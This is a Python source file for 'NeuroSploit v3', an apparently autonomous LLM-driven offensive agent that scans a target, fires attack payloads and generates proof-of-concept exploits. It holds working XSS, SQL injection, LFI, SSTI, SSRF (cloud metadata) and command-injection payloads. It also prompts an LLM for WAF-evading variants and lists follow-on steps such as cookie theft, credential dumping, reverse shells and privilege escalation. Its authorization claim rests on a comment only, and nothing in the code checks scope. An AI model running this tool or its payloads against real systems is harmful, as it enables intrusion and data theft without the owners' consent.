Files
NeuroSploit/backend/core/ai_pentest_agent.py
2026-01-19 19:21:57 -03:00

890 lines
34 KiB
Python

"""
NeuroSploit v3 - AI Offensive Security Agent
This is a TRUE AI AGENT that:
1. Uses LLM for INTELLIGENT vulnerability testing (not blind payloads)
2. Analyzes responses with AI to confirm vulnerabilities (no false positives)
3. Uses recon data to inform testing strategy
4. Accepts custom .md prompt files
5. Generates real PoC code and exploitation steps
AUTHORIZATION: This is an authorized penetration testing tool.
All actions are performed with explicit permission.
"""
import asyncio
import aiohttp
import json
import re
import os
import sys
from typing import Dict, List, Any, Optional, Callable, Tuple
from dataclasses import dataclass, field
from datetime import datetime
from urllib.parse import urljoin, urlparse, parse_qs, urlencode, quote
from enum import Enum
from pathlib import Path
# Add parent path for imports
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
try:
from core.llm_manager import LLMManager
except ImportError:
LLMManager = None
class AgentAction(Enum):
"""Actions the agent can take"""
DISCOVER = "discover"
TEST = "test"
EXPLOIT = "exploit"
CHAIN = "chain"
REPORT = "report"
PIVOT = "pivot"
@dataclass
class Finding:
"""A vulnerability finding with exploitation details"""
vuln_type: str
severity: str
endpoint: str
payload: str
evidence: str
exploitable: bool
confidence: str = "high" # high, medium, low
exploitation_steps: List[str] = field(default_factory=list)
poc_code: str = ""
impact: str = ""
chained_with: List[str] = field(default_factory=list)
raw_request: str = ""
raw_response: str = ""
llm_analysis: str = ""
@dataclass
class AgentState:
"""Current state of the AI agent"""
target: str
discovered_endpoints: List[str] = field(default_factory=list)
discovered_params: Dict[str, List[str]] = field(default_factory=dict)
technologies: List[str] = field(default_factory=list)
findings: List[Finding] = field(default_factory=list)
tested_payloads: Dict[str, List[str]] = field(default_factory=dict)
session_cookies: Dict[str, str] = field(default_factory=dict)
auth_tokens: List[str] = field(default_factory=list)
waf_detected: bool = False
waf_type: str = ""
current_phase: str = "recon"
actions_taken: List[str] = field(default_factory=list)
recon_context: Optional[Dict] = None
class AIPentestAgent:
"""
Autonomous AI Agent for Offensive Security Testing
This agent uses LLM to make INTELLIGENT decisions:
- What to test based on recon data
- How to craft context-aware payloads
- How to analyze responses to CONFIRM vulnerabilities
- How to chain attacks for maximum impact
NO FALSE POSITIVES - Every finding is confirmed by AI analysis.
"""
def __init__(
self,
target: str,
llm_manager: Optional[Any] = None,
log_callback: Optional[Callable] = None,
auth_headers: Optional[Dict] = None,
max_depth: int = 5,
prompt_file: Optional[str] = None,
recon_context: Optional[Dict] = None,
config: Optional[Dict] = None
):
self.target = target
self.llm_manager = llm_manager
self.log = log_callback or self._default_log
self.auth_headers = auth_headers or {}
self.max_depth = max_depth
self.prompt_file = prompt_file
self.custom_prompt = None
self.config = config or {}
self.state = AgentState(target=target, recon_context=recon_context)
self.session: Optional[aiohttp.ClientSession] = None
# Load custom prompt if provided
if prompt_file:
self._load_custom_prompt(prompt_file)
# Initialize LLM manager if not provided
if not self.llm_manager and LLMManager and config:
try:
self.llm_manager = LLMManager(config)
except Exception as e:
print(f"Warning: Could not initialize LLM manager: {e}")
# Base payloads - LLM will enhance these based on context
self.base_payloads = self._load_base_payloads()
async def _default_log(self, level: str, message: str):
print(f"[{level.upper()}] {message}")
def _load_custom_prompt(self, prompt_file: str):
"""Load custom prompt from .md file"""
try:
path = Path(prompt_file)
if not path.exists():
# Try in prompts directory
path = Path("prompts") / prompt_file
if not path.exists():
path = Path("prompts/md_library") / prompt_file
if path.exists():
content = path.read_text()
self.custom_prompt = content
print(f"[+] Loaded custom prompt from: {path}")
else:
print(f"[!] Prompt file not found: {prompt_file}")
except Exception as e:
print(f"[!] Error loading prompt file: {e}")
def _load_base_payloads(self) -> Dict[str, List[str]]:
"""Load base attack payloads - LLM will enhance these"""
return {
"xss": [
"<script>alert(1)</script>",
"\"><script>alert(1)</script>",
"'-alert(1)-'",
"<img src=x onerror=alert(1)>",
],
"sqli": [
"'", "\"", "' OR '1'='1", "1' AND '1'='1",
"' UNION SELECT NULL--", "1' AND SLEEP(3)--",
],
"lfi": [
"../../../etc/passwd",
"....//....//etc/passwd",
"php://filter/convert.base64-encode/resource=index.php",
],
"ssti": [
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
"{{config}}", "{{self.__class__}}",
],
"ssrf": [
"http://127.0.0.1", "http://localhost",
"http://169.254.169.254/latest/meta-data/",
],
"rce": [
"; id", "| id", "$(id)", "`id`",
],
}
async def __aenter__(self):
connector = aiohttp.TCPConnector(ssl=False, limit=10)
timeout = aiohttp.ClientTimeout(total=30)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
headers.update(self.auth_headers)
self.session = aiohttp.ClientSession(connector=connector, timeout=timeout, headers=headers)
return self
async def __aexit__(self, *args):
if self.session:
await self.session.close()
async def run(self) -> Dict[str, Any]:
"""
Main agent loop - Think, Act, Observe, Adapt
Uses LLM for intelligent decision making at each step.
"""
await self.log("info", "=" * 60)
await self.log("info", "AI OFFENSIVE SECURITY AGENT ACTIVATED")
await self.log("info", "=" * 60)
await self.log("info", f"Target: {self.target}")
await self.log("info", f"Mode: LLM-POWERED INTELLIGENT TESTING")
if self.custom_prompt:
await self.log("info", f"Custom prompt loaded: {len(self.custom_prompt)} chars")
await self.log("info", "")
try:
# Phase 1: Reconnaissance (use recon data if available)
await self.log("info", "[PHASE 1] RECONNAISSANCE")
await self._recon_phase()
# Phase 2: LLM-Powered Vulnerability Testing
await self.log("info", "")
await self.log("info", "[PHASE 2] INTELLIGENT VULNERABILITY TESTING")
await self._testing_phase()
# Phase 3: Exploitation (only confirmed vulnerabilities)
if self.state.findings:
await self.log("info", "")
await self.log("info", "[PHASE 3] EXPLOITATION")
await self._exploitation_phase()
# Phase 4: Attack Chaining
if len(self.state.findings) > 1:
await self.log("info", "")
await self.log("info", "[PHASE 4] ATTACK CHAINING")
await self._chaining_phase()
# Generate Report
await self.log("info", "")
await self.log("info", "[PHASE 5] REPORT GENERATION")
report = await self._generate_report()
return report
except Exception as e:
await self.log("error", f"Agent error: {str(e)}")
import traceback
traceback.print_exc()
return {"error": str(e), "findings": [f.__dict__ for f in self.state.findings]}
async def _recon_phase(self):
"""Reconnaissance - use existing recon data or perform basic discovery"""
# Use recon context if available
if self.state.recon_context:
await self.log("info", " Using provided recon context...")
await self._load_recon_context()
else:
await self.log("info", " Performing basic reconnaissance...")
await self._basic_recon()
await self.log("info", f" Found {len(self.state.discovered_endpoints)} endpoints")
await self.log("info", f" Found {sum(len(v) for v in self.state.discovered_params.values())} parameters")
await self.log("info", f" Technologies: {', '.join(self.state.technologies[:5]) or 'Unknown'}")
async def _load_recon_context(self):
"""Load data from recon context"""
ctx = self.state.recon_context
# Load endpoints from various recon sources
if ctx.get("data", {}).get("endpoints"):
self.state.discovered_endpoints.extend(ctx["data"]["endpoints"][:100])
if ctx.get("data", {}).get("urls"):
self.state.discovered_endpoints.extend(ctx["data"]["urls"][:100])
if ctx.get("data", {}).get("crawled_urls"):
self.state.discovered_endpoints.extend(ctx["data"]["crawled_urls"][:100])
# Load parameters
if ctx.get("data", {}).get("parameters"):
for param_data in ctx["data"]["parameters"]:
if isinstance(param_data, dict):
url = param_data.get("url", self.target)
params = param_data.get("params", [])
self.state.discovered_params[url] = params
elif isinstance(param_data, str):
self.state.discovered_params[self.target] = self.state.discovered_params.get(self.target, []) + [param_data]
# Load technologies
if ctx.get("data", {}).get("technologies"):
self.state.technologies.extend(ctx["data"]["technologies"])
# Load from attack surface
if ctx.get("attack_surface"):
surface = ctx["attack_surface"]
if surface.get("live_hosts"):
for host in surface.get("live_urls", [])[:50]:
if host not in self.state.discovered_endpoints:
self.state.discovered_endpoints.append(host)
# Deduplicate
self.state.discovered_endpoints = list(set(self.state.discovered_endpoints))
async def _basic_recon(self):
"""Perform basic reconnaissance when no recon data is available"""
# Fingerprint
await self._fingerprint_target()
# Discover common endpoints
common_paths = [
"/", "/login", "/admin", "/api", "/api/v1",
"/user", "/search", "/upload", "/config",
"/?id=1", "/?page=1", "/?q=test",
]
parsed = urlparse(self.target)
base_url = f"{parsed.scheme}://{parsed.netloc}"
for path in common_paths:
url = urljoin(base_url, path)
try:
async with self.session.get(url, allow_redirects=False) as resp:
if resp.status < 400 and resp.status != 404:
self.state.discovered_endpoints.append(url)
# Extract params
if "?" in url:
parsed_url = urlparse(url)
params = list(parse_qs(parsed_url.query).keys())
self.state.discovered_params[url] = params
except:
pass
async def _fingerprint_target(self):
"""Fingerprint the target"""
try:
async with self.session.get(self.target) as resp:
body = await resp.text()
headers = dict(resp.headers)
# Server detection
server = headers.get("Server", "")
if server:
self.state.technologies.append(f"Server: {server}")
# X-Powered-By
powered = headers.get("X-Powered-By", "")
if powered:
self.state.technologies.append(powered)
# Technology signatures
tech_sigs = {
"PHP": [".php", "PHPSESSID"],
"ASP.NET": [".aspx", "__VIEWSTATE"],
"Java": [".jsp", "JSESSIONID"],
"Python": ["django", "flask"],
"Node.js": ["express", "connect.sid"],
"WordPress": ["wp-content", "wp-includes"],
"Laravel": ["laravel", "XSRF-TOKEN"],
}
for tech, sigs in tech_sigs.items():
for sig in sigs:
if sig.lower() in body.lower() or sig in str(headers):
if tech not in self.state.technologies:
self.state.technologies.append(tech)
break
except Exception as e:
await self.log("debug", f"Fingerprint error: {e}")
async def _testing_phase(self):
"""LLM-powered vulnerability testing"""
# Determine what to test based on recon data
test_strategy = await self._get_test_strategy()
# Get endpoints to test
endpoints = self.state.discovered_endpoints[:20] or [self.target]
for endpoint in endpoints:
await self.log("info", f" Testing: {endpoint[:60]}...")
for vuln_type in test_strategy:
# Get LLM-enhanced payloads for this context
payloads = await self._get_smart_payloads(endpoint, vuln_type)
for payload in payloads[:5]:
result = await self._test_and_verify(endpoint, vuln_type, payload)
if result and result.get("confirmed"):
finding = Finding(
vuln_type=vuln_type,
severity=self._get_severity(vuln_type),
endpoint=endpoint,
payload=payload,
evidence=result.get("evidence", ""),
exploitable=result.get("exploitable", False),
confidence=result.get("confidence", "high"),
llm_analysis=result.get("analysis", ""),
raw_request=result.get("request", ""),
raw_response=result.get("response", "")[:2000],
impact=self._get_impact(vuln_type),
)
self.state.findings.append(finding)
await self.log("warning", f" [CONFIRMED] {vuln_type.upper()} - {result.get('confidence', 'high')} confidence")
break # Found vuln, move to next type
async def _get_test_strategy(self) -> List[str]:
"""Use LLM to determine what to test based on recon data"""
# Default strategy
default_strategy = ["xss", "sqli", "lfi", "ssti", "ssrf"]
if not self.llm_manager:
return default_strategy
try:
# Build context for LLM
context = {
"target": self.target,
"technologies": self.state.technologies,
"endpoints_count": len(self.state.discovered_endpoints),
"parameters_count": sum(len(v) for v in self.state.discovered_params.values()),
"sample_endpoints": self.state.discovered_endpoints[:5],
}
prompt = f"""Based on the following reconnaissance data, determine the most likely vulnerability types to test.
Target: {context['target']}
Technologies detected: {', '.join(context['technologies']) or 'Unknown'}
Endpoints found: {context['endpoints_count']}
Parameters found: {context['parameters_count']}
Sample endpoints: {context['sample_endpoints']}
Custom instructions: {self.custom_prompt[:500] if self.custom_prompt else 'None'}
Return a JSON array of vulnerability types to test, ordered by likelihood.
Valid types: xss, sqli, lfi, rce, ssti, ssrf, xxe, idor, open_redirect
Example: ["sqli", "xss", "lfi"]
IMPORTANT: Only return the JSON array, no other text."""
response = self.llm_manager.generate(prompt, "You are a penetration testing expert. Analyze recon data and suggest vulnerability tests.")
# Parse response
try:
# Find JSON array in response
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
strategy = json.loads(match.group())
if isinstance(strategy, list) and len(strategy) > 0:
return strategy[:7]
except:
pass
except Exception as e:
await self.log("debug", f"LLM strategy error: {e}")
return default_strategy
async def _get_smart_payloads(self, endpoint: str, vuln_type: str) -> List[str]:
"""Get context-aware payloads from LLM"""
base = self.base_payloads.get(vuln_type, [])
if not self.llm_manager:
return base
try:
# Get endpoint context
params = self.state.discovered_params.get(endpoint, [])
techs = self.state.technologies
prompt = f"""Generate 3 specialized {vuln_type.upper()} payloads for this context:
Endpoint: {endpoint}
Parameters: {params}
Technologies: {techs}
WAF detected: {self.state.waf_detected} ({self.state.waf_type})
Requirements:
1. Payloads should be tailored to the detected technologies
2. If WAF detected, use evasion techniques
3. Include both basic and advanced payloads
Return ONLY a JSON array of payload strings.
Example: ["payload1", "payload2", "payload3"]"""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate effective but safe test payloads.")
try:
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
smart_payloads = json.loads(match.group())
if isinstance(smart_payloads, list):
return smart_payloads + base
except:
pass
except Exception as e:
await self.log("debug", f"Smart payload error: {e}")
return base
async def _test_and_verify(self, endpoint: str, vuln_type: str, payload: str) -> Optional[Dict]:
"""Test a payload and use LLM to verify if it's a real vulnerability"""
try:
# Prepare request
parsed = urlparse(endpoint)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
# Build params with payload
params = {}
if parsed.query:
for p in parsed.query.split("&"):
if "=" in p:
k, v = p.split("=", 1)
params[k] = payload
else:
test_params = self.state.discovered_params.get(endpoint, []) or ["id", "q", "search"]
for p in test_params[:3]:
params[p] = payload
# Send request
async with self.session.get(base_url, params=params, allow_redirects=False) as resp:
body = await resp.text()
status = resp.status
headers = dict(resp.headers)
# Build raw request for logging
raw_request = f"GET {resp.url}\n"
raw_request += "\n".join([f"{k}: {v}" for k, v in self.auth_headers.items()])
# First, do quick checks for obvious indicators
quick_result = self._quick_vuln_check(vuln_type, payload, body, status, headers)
if not quick_result.get("possible"):
return None
# If possible vulnerability, use LLM to confirm
if self.llm_manager:
confirmation = await self._llm_confirm_vulnerability(
vuln_type, payload, body[:3000], status, headers, endpoint
)
if confirmation.get("confirmed"):
return {
"confirmed": True,
"evidence": confirmation.get("evidence", quick_result.get("evidence", "")),
"exploitable": confirmation.get("exploitable", False),
"confidence": confirmation.get("confidence", "medium"),
"analysis": confirmation.get("analysis", ""),
"request": raw_request,
"response": body[:2000],
}
else:
# No LLM, use quick check result
if quick_result.get("high_confidence"):
return {
"confirmed": True,
"evidence": quick_result.get("evidence", ""),
"exploitable": True,
"confidence": "medium",
"analysis": "Confirmed by response analysis (no LLM)",
"request": raw_request,
"response": body[:2000],
}
except asyncio.TimeoutError:
if vuln_type == "sqli":
return {
"confirmed": True,
"evidence": "Request timeout - possible time-based SQL injection",
"exploitable": True,
"confidence": "medium",
"analysis": "Time-based blind SQLi detected",
}
except Exception as e:
await self.log("debug", f"Test error: {e}")
return None
def _quick_vuln_check(self, vuln_type: str, payload: str, body: str, status: int, headers: Dict) -> Dict:
"""Quick vulnerability check without LLM"""
result = {"possible": False, "high_confidence": False, "evidence": ""}
body_lower = body.lower()
if vuln_type == "xss":
# Check for exact payload reflection (unencoded)
if payload in body and "<" in payload:
result["possible"] = True
result["evidence"] = "XSS payload reflected without encoding"
# High confidence only if script tags execute
if "<script>" in payload.lower() and payload.lower() in body_lower:
result["high_confidence"] = True
elif vuln_type == "sqli":
sql_errors = [
"sql syntax", "mysql_", "sqlite_", "pg_query", "ora-",
"unterminated", "query failed", "database error",
"you have an error in your sql", "warning: mysql",
]
for error in sql_errors:
if error in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"SQL error: {error}"
break
elif vuln_type == "lfi":
lfi_indicators = ["root:x:", "root:*:", "[boot loader]", "daemon:", "/bin/bash"]
for indicator in lfi_indicators:
if indicator.lower() in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"File content: {indicator}"
break
elif vuln_type == "ssti":
if "49" in body and "7*7" in payload:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = "SSTI: 7*7=49 evaluated"
elif vuln_type == "rce":
rce_indicators = ["uid=", "gid=", "groups=", "/bin/", "/usr/"]
for indicator in rce_indicators:
if indicator in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"Command output: {indicator}"
break
elif vuln_type == "ssrf":
ssrf_indicators = ["root:", "localhost", "internal", "meta-data", "169.254"]
for indicator in ssrf_indicators:
if indicator in body_lower:
result["possible"] = True
result["evidence"] = f"Internal content: {indicator}"
break
return result
async def _llm_confirm_vulnerability(
self, vuln_type: str, payload: str, body: str, status: int, headers: Dict, endpoint: str
) -> Dict:
"""Use LLM to confirm if a vulnerability is real"""
prompt = f"""Analyze this HTTP response to determine if there is a REAL {vuln_type.upper()} vulnerability.
IMPORTANT: Only confirm if you are CERTAIN. Avoid false positives.
Endpoint: {endpoint}
Payload sent: {payload}
HTTP Status: {status}
Response headers: {json.dumps(dict(list(headers.items())[:10]))}
Response body (truncated): {body[:2000]}
Analyze and respond with JSON:
{{
"confirmed": true/false,
"confidence": "high"/"medium"/"low",
"evidence": "specific evidence from response",
"exploitable": true/false,
"analysis": "brief explanation"
}}
CRITICAL RULES:
1. For XSS: Payload must be reflected WITHOUT encoding in a context where it executes
2. For SQLi: Must see actual SQL error messages, not just reflected input
3. For LFI: Must see actual file contents (like /etc/passwd)
4. For SSTI: Math expressions must be EVALUATED (49 for 7*7)
5. For RCE: Must see command output (uid=, /bin/, etc.)
If uncertain, set confirmed=false. Better to miss a vuln than report false positive."""
try:
response = self.llm_manager.generate(
prompt,
"You are a security expert. Analyze HTTP responses to confirm vulnerabilities. Be precise and avoid false positives."
)
# Parse JSON response
match = re.search(r'\{.*?\}', response, re.DOTALL)
if match:
result = json.loads(match.group())
return result
except Exception as e:
await self.log("debug", f"LLM confirmation error: {e}")
return {"confirmed": False}
def _get_severity(self, vuln_type: str) -> str:
"""Get severity based on vulnerability type"""
severity_map = {
"rce": "critical",
"sqli": "critical",
"ssti": "critical",
"lfi": "high",
"ssrf": "high",
"xss": "high",
"xxe": "high",
"idor": "medium",
"open_redirect": "medium",
}
return severity_map.get(vuln_type, "medium")
def _get_impact(self, vuln_type: str) -> str:
"""Get impact description"""
impact_map = {
"rce": "Remote Code Execution - Full server compromise",
"sqli": "SQL Injection - Database compromise, data theft",
"ssti": "Server-Side Template Injection - RCE possible",
"lfi": "Local File Inclusion - Sensitive data exposure",
"ssrf": "Server-Side Request Forgery - Internal network access",
"xss": "Cross-Site Scripting - Session hijacking",
"xxe": "XML External Entity - Data theft, SSRF",
"idor": "Insecure Direct Object Reference - Data access",
"open_redirect": "Open Redirect - Phishing attacks",
}
return impact_map.get(vuln_type, "Security vulnerability")
async def _exploitation_phase(self):
"""Generate PoC code for confirmed vulnerabilities"""
await self.log("info", f" Generating PoC for {len(self.state.findings)} confirmed vulnerabilities...")
for finding in self.state.findings:
if finding.exploitable:
poc = await self._generate_poc(finding)
finding.poc_code = poc
finding.exploitation_steps = self._get_exploitation_steps(finding)
await self.log("info", f" PoC generated for {finding.vuln_type}")
async def _generate_poc(self, finding: Finding) -> str:
"""Generate PoC code using LLM if available"""
if self.llm_manager:
try:
prompt = f"""Generate a Python proof-of-concept exploit for this vulnerability:
Type: {finding.vuln_type}
Endpoint: {finding.endpoint}
Payload: {finding.payload}
Evidence: {finding.evidence}
Create a working Python script that:
1. Demonstrates the vulnerability
2. Includes proper error handling
3. Has comments explaining each step
4. Is safe to run (no destructive actions)
Return ONLY the Python code, no explanations."""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate safe, educational PoC code.")
# Extract code block
code_match = re.search(r'```python\n(.*?)```', response, re.DOTALL)
if code_match:
return code_match.group(1)
elif "import" in response:
return response
except Exception as e:
await self.log("debug", f"PoC generation error: {e}")
# Fallback to template
return self._get_poc_template(finding)
def _get_poc_template(self, finding: Finding) -> str:
"""Get PoC template for a vulnerability"""
return f'''#!/usr/bin/env python3
"""
{finding.vuln_type.upper()} Proof of Concept
Target: {finding.endpoint}
Generated by NeuroSploit AI Agent
"""
import requests
def exploit():
url = "{finding.endpoint}"
payload = "{finding.payload}"
response = requests.get(url, params={{"test": payload}})
print(f"Status: {{response.status_code}}")
print(f"Vulnerable: {{{repr(finding.evidence)}}} in response.text")
if __name__ == "__main__":
exploit()
'''
def _get_exploitation_steps(self, finding: Finding) -> List[str]:
"""Get exploitation steps for a vulnerability"""
steps_map = {
"xss": [
"1. Confirm XSS with alert(document.domain)",
"2. Craft cookie stealing payload",
"3. Host attacker server to receive cookies",
"4. Send malicious link to victim",
],
"sqli": [
"1. Confirm injection with error-based payloads",
"2. Enumerate database with UNION SELECT",
"3. Extract table names from information_schema",
"4. Dump sensitive data (credentials, PII)",
],
"lfi": [
"1. Confirm LFI with /etc/passwd",
"2. Read application source code",
"3. Extract credentials from config files",
"4. Attempt log poisoning for RCE",
],
"rce": [
"1. CRITICAL - Confirm command execution",
"2. Establish reverse shell",
"3. Enumerate system and network",
"4. Escalate privileges",
],
}
return steps_map.get(finding.vuln_type, ["1. Investigate further", "2. Attempt exploitation"])
async def _chaining_phase(self):
"""Analyze potential attack chains"""
await self.log("info", " Analyzing attack chain possibilities...")
vuln_types = [f.vuln_type for f in self.state.findings]
if "xss" in vuln_types:
await self.log("info", " Chain: XSS -> Session Hijacking -> Account Takeover")
if "sqli" in vuln_types:
await self.log("info", " Chain: SQLi -> Data Extraction -> Credential Theft")
if "lfi" in vuln_types:
await self.log("info", " Chain: SQLi + LFI -> Database File Read -> RCE via INTO OUTFILE")
if "ssrf" in vuln_types:
await self.log("info", " Chain: SSRF -> Cloud Metadata -> AWS Keys -> Full Compromise")
async def _generate_report(self) -> Dict[str, Any]:
"""Generate comprehensive report"""
report = {
"target": self.target,
"scan_date": datetime.utcnow().isoformat(),
"agent": "NeuroSploit AI Agent v3",
"mode": "LLM-powered intelligent testing",
"llm_enabled": self.llm_manager is not None,
"summary": {
"total_endpoints": len(self.state.discovered_endpoints),
"total_parameters": sum(len(v) for v in self.state.discovered_params.values()),
"total_vulnerabilities": len(self.state.findings),
"critical": len([f for f in self.state.findings if f.severity == "critical"]),
"high": len([f for f in self.state.findings if f.severity == "high"]),
"medium": len([f for f in self.state.findings if f.severity == "medium"]),
"low": len([f for f in self.state.findings if f.severity == "low"]),
"technologies": self.state.technologies,
},
"findings": [],
"recommendations": [],
}
for finding in self.state.findings:
report["findings"].append({
"type": finding.vuln_type,
"severity": finding.severity,
"confidence": finding.confidence,
"endpoint": finding.endpoint,
"payload": finding.payload,
"evidence": finding.evidence,
"impact": finding.impact,
"exploitable": finding.exploitable,
"exploitation_steps": finding.exploitation_steps,
"poc_code": finding.poc_code,
"llm_analysis": finding.llm_analysis,
})
# Log summary
await self.log("info", "=" * 60)
await self.log("info", "REPORT SUMMARY")
await self.log("info", "=" * 60)
await self.log("info", f"Confirmed Vulnerabilities: {len(self.state.findings)}")
await self.log("info", f" Critical: {report['summary']['critical']}")
await self.log("info", f" High: {report['summary']['high']}")
await self.log("info", f" Medium: {report['summary']['medium']}")
for finding in self.state.findings:
await self.log("warning", f" [{finding.severity.upper()}] {finding.vuln_type}: {finding.endpoint[:50]}")
return report